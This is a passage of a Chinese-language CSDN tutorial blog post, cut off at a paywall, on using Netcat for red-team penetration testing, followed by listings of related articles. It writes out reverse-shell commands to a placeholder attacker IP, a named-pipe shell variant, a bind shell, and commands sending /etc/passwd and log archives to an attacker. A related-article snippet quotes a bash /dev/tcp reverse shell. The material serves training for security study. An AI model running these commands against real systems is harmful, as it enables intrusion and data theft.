Day8 Kali黑客工具NetCat和Socat

已于 2025-04-12 12:38:01 修改
阅读量760 收藏 30
点赞数 28
分类专栏: OSCP 文章标签: web安全 linux
于 2025-04-11 23:13:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bugatti100Peagle/article/details/147155996
版权

泷羽Sec-静安,专注网络安全与编程技术的学习与分享,探索技术细节与实际应用。声明:本公众号所分享的工具与资源,仅供学习与研究使用,严禁用于任何非法活动。

Netcat(nc)

Netcat(nc)因其灵活的TCP/UDP通信能力,在红队渗透测试中扮演着重要角色。• Netcat下载:Windows版nc.exe可从Sysinternals Suite获取。后台回复“配套工具”获取本文的工具

1. 反向Shell获取控制权

用途:绕过防火墙限制,建立隐蔽的远程控制通道。
操作步骤

  1. 攻击端监听(接收Shell):

    nc -lvp 4444 -e /bin/bash   # 传统方法(需目标支持-e参数)

  2. 目标端连接(主动回连):

    nc [攻击者IP] 4444 -e /bin/bash   # 直接执行Shell

    绕过限制技巧(无-e参数时):

    mkfifo /tmp/f; nc [攻击者IP] 4444 < /tmp/f | /bin/bash > /tmp/f 2>&1

    优势:通过命名管道实现无-e参数环境下的Shell反弹。

2. 端口扫描与监听

用途:快速探测目标开放端口或搭建临时服务。
实战命令
端口扫描(快速识别脆弱服务):

nc -zv 192.168.1.100 1-1024   # 扫描1-1024端口(-z为扫描模式,-v显示详情)

监听端口(捕获敏感流量):

nc -l -p 8080 > captured_data.log   # 记录所有传入数据到文件

3. 文件传输与数据窃取

用途:内网横向移动时快速交换工具或窃取数据。
操作示例
单向传输

# 接收端(攻击机):
nc -l -p 1234 > stolen_data.tar.gz

# 发送端(目标机):
nc [攻击者IP] 1234 < /etc/passwd   # 发送敏感文件

目录批量传输(结合tar压缩):

# 目标机打包发送:
tar -czf - /var/log/ | nc [攻击者IP] 1234

# 攻击机接收解压:
nc -l -p 1234 | tar -xzvf -

4. 内网穿透与端口转发

用途:突破网络边界,访问受限内网资源。
典型场景
正向代理(目标机可直连外网):

# 目标机监听内网服务:
nc -l -p 5555 -e /bin/bash   # 暴露Shell到本地5555端口
最低0.47元/天 解锁文章
linux渗透测试常用命令
AI拉呱,专注于人工智与网络安全方面的研究,关注一起学习。
08-07 329
【代码】linux渗透测试常用命令。
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 6104
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
Kali Linux渗透测试 119 隧道工具--SOCAT
kevinhanser
04-08 1097
本文记录 Kali Linux 2018.1 学习使用渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 被称为 nc++(增强增强版的nc)双向数据流通道工具 连接端口Socat - tcp:1.1.1.1:80 侦听端口(作为服务端)socat - tcp4-listen:22 / socat -
Netcat 的攻击与防御
Kali与编程
02-17 1071
Netcat 是一个功能强大的网络工具,被广泛用于网络安全领域。其主要功能有:建立 TCP/UDP 连接、监听端口、传输文件等。由于其简单、轻量、易用的特点,被网络安全从业者称为“网络瑞士军刀”。本文介绍了如何使用 Netcat 进行 DDOS 攻防的原理与实践。虽然 Netcat 可用于模拟简单的 DDOS 攻击防御,但实际应用中的攻击手段防御策略可能更为复杂。此外,使用 Netcat 发起 DDOS 攻击可能触发目标服务器的防御机制,从而导致攻击失败。
渗透测试工具--NetCat的使用
dreamer_96的博客
03-04 4910
渗透测试工具--NetCat的使用什么是NetCatNetCat的作用用法常用选项 什么是NetCat 在网络工具中有“瑞士军刀”美誉的NetCat,首次出现在1995年。NetCat其实是一个非常简单的Unix工具,他的实际可运行的名字叫nc。非常棒的是,NetCat可以与其他工具结合重定向,因此,可以说它是互联网里短小精悍的多功能工具NetCat的作用 聊天工具 端口扫描 远程控制 文件传输 telnet/获取banner信息 手动连接网络服务 用法 nc属于kali自带工具,位置如下: ┌─
内网渗透----netcat工具使用
Armandhe的博客
06-21 552
nc内网端口转发
揭秘最为知名的黑客工具之一: Netcat!适用安全测试、渗透测试、黑客攻击!
测试开发技术
09-18 1009
在网络安全领域,黑客工具一直备受关注。它们既可以被用于攻击,也可以用于防御。本文将为大家揭秘一款知名的黑客工具:Netcat
网络安全笔记第四天day4(kali基本操作)
srty44的博客
08-10 7452
执行apt-get dist-upgrade执行升级命令升级为最新系统包。7.升级kali系统
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 1068
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0
Exp2 后门原理与实践 20204308李文艳
m0_61155000的博客
03-23 633
在做实验过程中出现了许多小问题,在之后的问题排除过程中可以发现近80%的问题是由于小细节,比如单词拼写错误,缺少空格等,这些问题只要再细心一些就可以避免。
渗透基础工具netcat使用
m0_48449635的博客
01-20 155
nc是netcat的简写,有着网络界的瑞士军刀美誉。该工具简单直接,素有此荣誉称号。
linux 命令:scp (pscp)、rz/sz、nc (netcat)、ncat、socat、ssh、端口转发(rinetd)
热门推荐
freeking101的博客
11-22 3万+
NC 全名 Netcat (网络刀),作者是 Hobbit && ChrisWysopal。因其功能十分强大,体积小巧而出名,被誉为网络安全界的 "瑞士军刀"。Netcat 使用 TCP 或 UDP 协议的网络连接去读写数据。Netcat 也是稳定的后门工具、功能强大的网络调试探测工具。能够直接由其它程序脚本轻松驱动。能够建立几乎所有类型的网络连接。在中国NC 的 WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由 "红与黑" 编译后的新浓缩版。.........
Linux网络命令:网络工具socat详解
weixin_70208651的博客
07-09 7248
socat 是多功能的网络工具,在 Linux Unix 系统中进行双向数据传输。Socket CAT表示它可以像 cat 命令那样处理数据流,但主要针对网络套接字其他数据源目的地。被看作是 netcat(nc)的超级集,它不仅支持TCP/UDP 流,支持多种类型的连接,如 UNIX 域套接字、管道、文件、命名管道、串行端口、伪终端(pty)、OpenSSL 加密的套接字等。它能够在任意两个数据流之间创建双向通道。支持大多协议,包括HTTP、HTTPS、SOCKS5、SM等。仔细配置,避免潜在的风险
网络安全零基础培训 L1-3 Kali命令基础
2401_86544210的博客
04-17 1392
Nmap(端口扫描器)Wireshark(数据包分析器)(应用于对无线局域网进行渗透测试的软件)(密码破解器)Nessus(很强大的漏洞扫描工具)OpenVAS(开源的漏洞扫描工具)Burp Suite(用于web应用安全测试的集成平台)SQLmap自动化的SQL注入工具wireshark网络协议分析工具kali预装的这些软件包含了很多黑客会使用到的很多工具,但是不要用这些工具去私自攻击未授权的一些网站)
IEEE会议:第十届网络安全与信息工程国际会议(ICCSIE 2025)
最新发布
iaast的博客
04-28 337
2025西部信息工程与技术学术论坛暨第十届网络安全与信息工程国际会议(10th International Conference on Cyber Security and Information Engineering)将于7月23-25日西宁召开。本届会议由北京工业大学、青海理工学院主办,浙江工业大学协办,IEEE计算机学会(IEEE Computer Society)技术赞助。
安恒web安全春招实战
persist213的博客
04-24 1429
以下是一份涵盖XSS/SSRF漏洞场景复现与绕过技术的模拟面试题目及参考答案,分三个维度:基础原理与防御机制、实战场景复现高级绕过思路。《网安面试指南》5000篇网安资料库。
【杂谈】-人工智能驱动的网络安全威胁:新一代网络钓鱼
视觉与物联智能
04-28 592
在网络安全领域,人工智能(AI)引发的网络威胁正对全球个人组织构成重大风险。传统网络钓鱼攻击因AI工具的滥用不断升级,其频率、复杂性隐蔽性逐年攀升。其中,**AI语音钓鱼(Vishing)**因其技术先进性高欺骗性,成为最值得关注的新型攻击手段。
网络准入控制系统:2025年网络安全的坚固防线
Synfuture的博客
04-25 261
客户端软件安装在需要接入网络的终端设备上,负责收集设备的各类信息,依据预先设定的控制策略对客户端提交的信息进行评估。不同身份所能访问的资源是不同的。阳途网络准入控制系统是现代网络安全体系中的重要组成部分,守护着网络空间的信息安全与稳定运行,在各个领域都发挥着不可或缺的关键作用,并将持续随着技术的发展而不断优化完善。在多分支结构的企业或大型组织中,阳途网络准入控制系统还能实现统一管理,只要其设备接入网络,都将受到统一的安全准入标准约束,避免因各地安全标准不一致而产生的安全漏洞。
网络安全:从入门到精通,从概念到案例的全面解析
我是赛博AI Lewis
04-27 719
在数字化转型的浪潮中,网络安全已成为保障国家战略安全、企业核心利益与个人隐私的基石。从勒索软件攻击到国家级APT(高级持续性威胁),网络威胁的复杂性与破坏性不断升级。本文以系统性视角,从基础概念、学习路径、核心架构、关键技术到实战案例,构建一条从入门到精通的网络安全知识体系,为从业者与学习者提供全面指引。网络安全是一门融合技术、管理与战略的综合性学科。随着AI、量子计算等技术的突破,未来的网络安全将更加智能化与主动化。唯有构建体系化的知识框架、深入理解攻防本质,方能在数字时代的攻防博弈中立于不败之地。
kali安装netcat
01-07
### 如何在 Kali Linux 上安装 Netcat 对于 Kali Linux 用户来说,Netcat 已经预装于大多数版本之中。然而,在某些情况下可能需要重新安装或确认其存在。 #### 验证 Netcat 是否已安装 为了验证 Netcat 是否已经存在于系统中,可以通过执行以下命令: ```bash which nc ``` 如果返回路径 `/usr/bin/nc` 或者类似的路径,则表示 Netcat 已经成功安装[^1]。 #### 使用 APT 安装 NetcatNetcat 并未被安装时,可以利用 `apt-get` 来完成这一过程。打开终端并输入如下指令更新软件源列表以及安装 Netcat: ```bash sudo apt update && sudo apt install netcat -y ``` 上述命令会自动下载最新版本的 Netcat 及依赖项,并将其部署到操作系统内。 #### 测试 Netcat 功能 一旦安装完毕之后,建议通过简单的测试案例来检验 Netcat 的工作状态。例如创建一个监听服务器端口的服务实例: ```bash nc -lvnp 8080 ``` 此命令将在本地机器上启动一个侦听 TCP 端口 8080 的服务[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

泷羽Sec-静安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值